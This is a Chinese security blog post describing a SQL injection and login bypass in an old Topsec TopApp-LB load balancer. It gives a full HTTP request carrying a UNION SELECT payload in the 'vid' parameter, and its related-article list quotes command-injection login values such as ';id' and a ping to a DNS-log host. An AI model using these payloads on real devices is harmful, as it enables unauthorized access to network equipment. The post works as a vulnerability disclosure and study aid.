天融信TOPApp-LB负载均衡-2020HW

最新推荐文章于 2023-08-19 14:51:34 发布
最新推荐文章于 2023-08-19 14:51:34 发布
阅读量1.9k 收藏 1
点赞数 2
分类专栏: 安全测试:web\app\工具 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43650289/article/details/108803978
版权

目录

描述

概述

影响

漏洞利用过程

前台绕过

注入

修复建议

天融信TOPApp-LB负载均衡SQL注入

描述

天融信负载均衡 TopAPP-LB产品旧版本在管理面存在SQL注入漏洞,具体为在可以访问管理服务情况 下,攻击者通过构造恶意请求,利用系统检查输入条件不严格的缺陷,进一步可获取部分系统本地信息。

概述

天融信负载均衡系统(以下简称TopApp产品)是一款融合了智能带宽控制功能的链路及服务器负载均衡产品。通过对网络出口链路和服务器资源的优化调度,TopApp-LB负载均衡系统让大规模的应用部署轻松实现,同时达至最稳定的运行效果,最高的资源利用率,最佳的应用性能和用户体验。大量的企事业单位通过TopApp-LB负载均衡系统顺利实现了应用部署,满足了信息化发展的需求,并极大地提升了工作效率。

影响

V1.2.8.0#xxx ,该版本存在于 2014年之前销售的产品。

漏洞利用过程

前台绕过

  • 抓包分析 /login_check.php 这是一段检查登录的包;仔细观察

  • 查看用户名密码位置是否存在注入——绕过

  • 查看返回包信息 200 ok

  • DNSLOG 进行回显测试

 

  • 进入主界面

注入

  • 查找注入点进行检测

  • 进行SQLMAP的尝试

  • 使用手工进行盲注测试-布尔型

 可以参考盲注代码:

https://blog.csdn.net/weixin_43650289/article/details/106992794

POST /acc/clsf/report/datasource.php HTTP/1.1
Host: 
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=t05cisbprlg0vb2b65j4e4sma5
Content-Length: 206


t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@

 

修复建议

 TopAPP-LB以上版本产品,进行升级改造或者打补丁

结束!!!

参考文章:。。。。

 

 

 

战神/calmness
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
负载均衡 TopAPP-LB SQL 注入
m0_48520508的博客
09-23 844
网络安全检测与防护技术国家地方联合工程研究中心 1、负载均衡系统概述 天负载均衡系统(以下简称TopApp产品)是一款合了智能带宽控制功能的链路及服务器负载均衡产品。通过对网络出口链路和服务器资源的优化调度,TopApp-LB负载均衡系统让大规模的应用部署轻松实现,同时达至最稳定的运行效果,最高的资源利用率,最佳的应用性能和用户体验。大量的企事业单位通过TopApp-LB负载均衡系统顺利实现了应用部署,满足了息化发展的需求,并极大地提升了工作效率。 天负载均衡设备图: 应用场景图: 2、漏洞
TopApp-LB 负载均衡系统
weixin_44508748的博客
11-21 2211
fofa:"TopApp-LB" 1.任意用户登录 ①用户名随意 密码:;id(天负载均衡TopApp-LB系统无需密码直接登录) ②用户名: ; ping 9928e5.dnslog.info; echo 密码:随意 登录成功 2.sql注入漏洞 注入点vid t=l&e=0&s=t&l=1&vid=1'--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=
负载均衡配置手册
04-25
负载均衡配置手册
TopApp NLB链路负载配置指导文档v2.doc
11-13
TopApp负载均衡系统的配置指导文档,从初始化开始详细指导了配置过程,建议大家下载使用。天负载均衡系统(以下简称TopApp产品)为客户提供高可靠的数据中心解决方案,包括链路负载均衡解决方案、服务器负载均衡解决方案、全局负载均衡解决方案。系统集成了压缩、缓存、SSL卸载等网络优化技术,加速业务系统提升系统效率。同时结合Web应用防火墙、DNS防火墙、DDoS攻击防护及漏洞扫描功能形成全方位的网络安全防护,为客户业务系统安全保驾护航。
TopApp-LB 负载均衡系统漏洞总结
Adminxe的博客
09-23 1273
0x00 漏洞描述 1、天负载均衡TopApp-LB系统无需密码直接登陆 2、天TopApp-LB负载均衡命令执行漏洞 3、天TopApp-LB 负载均衡系统Sql注入漏洞 0x01 漏洞复现 1、使用poc::用户名随意 密码:;id 2、使用poc:; ping xxx.dnslog.info; echo 3.1、抓包 3.2、vid参数加单引号,报错 3.3、使用or 1=1 or 1=2发现返回界面不一样,证明存在注入点(布尔盲注) ...
2021Kfzz1#wiki#天负载均衡TopApp-LB任意登陆1
07-25
负载均衡TopApp-LB任意登陆漏洞描述天负载均衡TopApp-LB系统无需密码可直接登陆,查看敏感息影响版本天负载均衡TopApp-LB漏洞
网络负载均衡
#维多利亚的秘密#
08-05 2228
负载均衡是由多台服务器以对称的方式组成一个服务器集合,每台服务器都具有等价的地位,都可以单独对外提供服务而无须其他服务器的辅助。通过某种负载分担技术,将外部发送来的请求均匀分配到对称结构中的某一台服务器上,而接收到请求的服务器独立地回应客户的请求。均衡负载能够平均分配客户请求到服务器列阵,籍此提供快速获取重要数据,解决大量并发访问服务问题。 目录 1定义
-息安全产品认证证书
最新发布
04-29
-息安全产品认证证书
负载均衡NLB快速配置手册
01-03
负载均衡NLB(Network Load Balancing,网络负载均衡)是一种技术,用于在多台服务器之间分配网络流量,以确保高可用性和性能。本快速配置手册将帮助你理解NLB的基本概念,并提供步骤来配置和管理NLB服务。 一、...
负载均衡TopApp-LB命令执行
自强不息
06-27 252
时光静悄悄地流逝。世界上有些人因为忙而感到生活的沉重,而有些人因为闲而活得压抑。
各品牌防火墙及负载均衡抓包手册
01-09
Juniper Netscreen OS抓包方法 2 天防火墙 抓包方法 3 Hillstone山石防火墙抓包方法 4 华为防火墙 抓包方法 5 A10 负载均衡抓包方法 6 F5 抓包方法 7 FortiGate飞塔防火墙抓包方法 11 Linux tcpdump使用方法 15
防火墙配置手册.zip
07-14
目录 ACM NGTOS WAF 防毒墙 防火墙 负载均衡 静态隧道 漏扫 入侵防御 网闸
网络安全---负载均衡案例
m0_68976043的博客
08-19 3903
注意:a) 不要使用上传功能,上传功能会分片上传,导致分散在不同 Node 上。b) 要保证每一台 Node 上都有相同路径的 antproxy.jsp, 所以保存了很多次,保证每一台都上传了脚本1.5.2修改 Shell 配置, 将 URL 部分填写为 antproxy.jsp 的地址,其它配置不变1.5.3测试执行命令, 查看 IP可以看到 IP 已经固定, 意味着请求已经固定到了 LBSNode1 这台机器上了。此时使用分片上传、HTTP 代理,都已经跟单机的情况没什么区别了。
负载均衡TopApp-LB任意登陆
自强不息
06-28 332
青年,青年!无论受怎样的挫折和打击,都要咬着牙关挺住,因为你们完全有机会重建生活;只要不灰心丧气,每一次挫折就只不过是通往新境界的一块普通绊脚石,而绝不会置人于死命。
防火墙tcpdump
weixin_47276392的博客
03-14 4592
一、为什么要抓包 平时在调试设备中最有效的排错手段就是抓包,有些时候因为网络环境不一样总会出现抓包看不到的情况,这里给大家整合了一下抓包的案例。 (1)以ICMP报文做测试: system tcpdump -ni any icmp and host 1.2.4.8 为例 system tcpdump -ni 这个可以不进行修改 any 表示抓取哪一个物理口的数据包any是所有,可以添加具体接口例如eth1、feth1 icmp表示抓取ic...
防火墙NGFW4000配置
weixin_37123068的博客
11-25 7980
这几天遇到一个问题,内网服务器通过防火墙NAT转换成公网地址,对方服务器通过公网地址能够访问服务器,但是通过服务器访问对方服务器时,访问不到,对面的服务器也是通过防火墙地址NAT转换过来的。 环境说明:192.168.1.1、192.168.1.2、192.168.1.3组成一个局域网,能够互相访问,其中192.168.1.1在防火墙上NAT位231.1.3.10。231.1.3.1、231.1...
负载均衡的搭建方案
热门推荐
zoujunjie202的博客
10-07 1万+
负载均衡是一个很大的话题,也是一个很小的话题,小到一个基本理念,你必须通过负载均衡提供多点服务。在架构搭建的最初最初阶段,就应该实施非单点服务的架构体系,这样才可以确保业务不被中断。
topsec—基础配置
dongxie_tk的博客
03-29 4357
1. WAF端设置(1)默认使用网络接口:ETH0(2)默认IP地址:192.168.1.2542. PC端设置(1)主机IPV4地址设置:192.168.1.*(1<*<255,即只需1网段下地址即可)(2)设置ipv4地址的相对应IP掩码、默认网管地址3. web端login设置(1)账号:Superman(2)首次登录默认密码:talent(3)修改之后使用密码:Talent@1...
负载均衡系统配置全面指南
"天负载均衡配置手册,包含了天负载均衡系统的详细介绍和配置指南,涵盖了应用负载均衡、链路负载均衡、全局负载均衡等核心概念,以及安装、初次使用、WEB管理等多个方面的内容。手册提供了详细的硬件安装...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

战神/calmness

你的鼓励是我最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值